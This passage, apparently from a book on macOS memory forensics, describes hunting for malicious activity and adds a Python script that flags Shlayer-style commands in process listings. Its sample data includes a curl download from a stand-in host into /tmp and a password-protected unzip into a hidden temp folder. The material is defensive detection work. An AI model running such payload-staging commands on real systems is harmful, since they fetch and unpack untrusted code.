Searching for malicious activity
Searching for malicious activity in macOS boils down to the elements we dealt with in the previous chapters: looking for suspicious network connections, looking for anomalies in processes, looking for code injection, looking for traces of the hooking techniques used, and examining the commands executed in the shell. For example, Shlayer uses the shell to download the payload with the curl utility, passing -f0L as one of the command-line arguments, and to unpack a password-protected archive into a directory under /tmp with the unzip command. At the same time, running scripts and commands in the shell can be part of more sophisticated attacks in which the threat actors have direct access to the host.
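The shell-command review described above can be automated once process command lines have been extracted from the memory dump. The following is an added example (not code from the book or from Volatility): it takes a list of (pid, ppid, command line) records, unwraps sh -c wrappers, and flags the two Shlayer indicators named in the text, curl invoked with the bundled -f0L switches and unzip of a protected archive into /tmp. The process records are constructed sample data, and the flag and path heuristics are the author's assumptions, not a signature from the page.

```python
import os
import shlex

# Constructed sample process records (pid, ppid, command line), shaped like the
# output of a Volatility process listing. Hypothetical data, not from the page.
SAMPLE_PROCESSES = [
    (412, 1, "/usr/libexec/trustd"),
    (533, 501, '/bin/sh -c "curl -f0L https://example.invalid/p -o /tmp/p.zip"'),
    (534, 533, "unzip -o -P s3cret /tmp/p.zip -d /tmp/.u"),
    (540, 501, "curl -L https://example.invalid/tool.tar.gz"),
    (541, 501, "unzip /Users/analyst/Downloads/report.zip -d /Users/analyst/Documents"),
]

SHELLS = {"sh", "bash", "zsh"}
SHLAYER_CURL_FLAGS = {"f", "0", "L"}          # -f0L as described in the text
TMP_ROOTS = ("/tmp", "/private/tmp")           # /tmp is a symlink to /private/tmp on macOS


def short_flags(argv):
    """Set of single-letter switches, expanding bundled forms such as -f0L."""
    flags = set()
    for arg in argv[1:]:
        if len(arg) > 1 and arg[0] == "-" and arg[1] != "-":
            flags.update(arg[1:])
    return flags


def option_value(argv, opt):
    """Value that follows a given switch in argv, or None if absent."""
    if opt in argv:
        i = argv.index(opt)
        if i + 1 < len(argv):
            return argv[i + 1]
    return None


def under_tmp(path):
    """True if the normalized path lies under one of the temp roots."""
    p = os.path.normpath(path)
    return any(p == root or p.startswith(root + "/") for root in TMP_ROOTS)


def findings_for(cmdline):
    """Return a list of finding strings for one command line (empty if nothing matched)."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:
        return ["unparseable command line"]
    if not argv:
        return []
    prog = os.path.basename(argv[0])
    # Unwrap "sh -c '<command>'" so the inner command is the one inspected.
    inner = option_value(argv, "-c")
    if prog in SHELLS and inner is not None:
        return findings_for(inner)
    out = []
    if prog == "curl":
        if SHLAYER_CURL_FLAGS <= short_flags(argv):
            out.append("curl invoked with -f0L (Shlayer-style download)")
        dest = option_value(argv, "-o")
        if dest and under_tmp(dest):
            out.append(f"curl output written under /tmp: {dest}")
    elif prog == "unzip":
        if "-P" in argv:
            out.append("unzip of a password-protected archive")
        dest = option_value(argv, "-d")
        if dest and under_tmp(dest):
            out.append(f"unzip extracting under /tmp: {dest}")
    return out


def scan(processes):
    """Map pid -> findings for every process whose command line matched."""
    return {pid: f for pid, _ppid, cmd in processes if (f := findings_for(cmd))}


if __name__ == "__main__":
    for pid, hits in scan(SAMPLE_PROCESSES).items():
        print(pid, "|", "; ".join(hits))
```

Running the block prints only the two constructed Shlayer-like processes (533 and 534); the plain curl -L download and the unzip into a user directory produce no findings. The parent/child relationship (534 is a child of 533) is kept in the records so the same data can feed a process-tree view.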
To look for code injection, we can use the familiar mac_malfind plugin. However, please note here that running the plugin on memory dumps taken from hosts with the M1 chip may cause execution errors: